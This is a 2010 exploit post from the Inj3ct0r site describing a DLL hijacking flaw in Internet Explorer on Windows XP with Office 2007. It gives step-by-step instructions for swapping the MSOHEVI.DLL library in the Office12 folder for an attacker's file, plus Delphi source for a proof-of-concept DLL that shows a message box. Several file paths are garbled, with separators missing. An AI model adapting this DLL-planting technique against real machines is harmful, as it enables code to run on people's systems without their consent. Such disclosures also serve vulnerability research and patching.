Home / os / win7

Internet Explorer Dll Hijacking Exploit

Posted on 08 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Internet Explorer Dll Hijacking Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
Internet Explorer Dll Hijacking Exploit
=======================================

Exploit Title  : [Internet Explorer Dll Hijacking Exploit]
Date           : [08 Sept 2010]
Author         : [STRELiTZIA]
Software       : [INTERNET EXPLORER]
Tested on      : [Windows Xp SP3 + Office 2007]
	
============================
=       Description        = 
============================
Internet Explorer laod %drive%:\%Program Files%Microsoft OfficeOffice12MSOHEVI.DLL library without checks,
or any visual warning messages related to library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.
 
 
============================
=       Instructions       =
============================
1- Copy &quot;Test.dll&quot; into &quot;%drive%:\%Program Files%Microsoft OfficeOffice12&quot;
2- Rename &quot;MSOHEVI.DLL&quot; to &quot;MSOHEVI.DLL_Original&quot;.
3- Rename &quot;Test.dll&quot; to &quot;MSOHEVI.DLL&quot;.
	
============================
=          Tests           =
============================
- Launch Internet Explorer.

	
============================
= Test Dll Source &quot;Delphi&quot; =
============================
Library Test;
uses
  Windows;

begin
  MessageBoxA
    (
    0,
    PChar('Yep, I''m running in your system without your permission.'),
	PChar('Sample'),
    MB_ICONSTOP
    );
end.


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :